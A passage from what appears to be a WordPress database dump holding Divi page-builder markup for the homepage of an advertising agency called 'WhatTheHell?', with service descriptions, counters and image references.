button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:56:00','2020-07-09 20:56:00','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(324,1,'2020-07-10 14:34:15','2020-07-10 14:34:15','cover image for advertising agency website','Desktop-HD-1024x728 (1)','','inherit','open','closed','','desktop-hd-1024x728-1','','','2020-07-10 14:35:34','2020-07-10 14:35:34','',0,'https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png',0,'attachment','image/png',0),(325,1,'2020-07-10 14:36:30','2020-07-10 14:36:30','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Creative agency cover image\" title_text=\"Desktop-HD-1024x728 (1)\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" 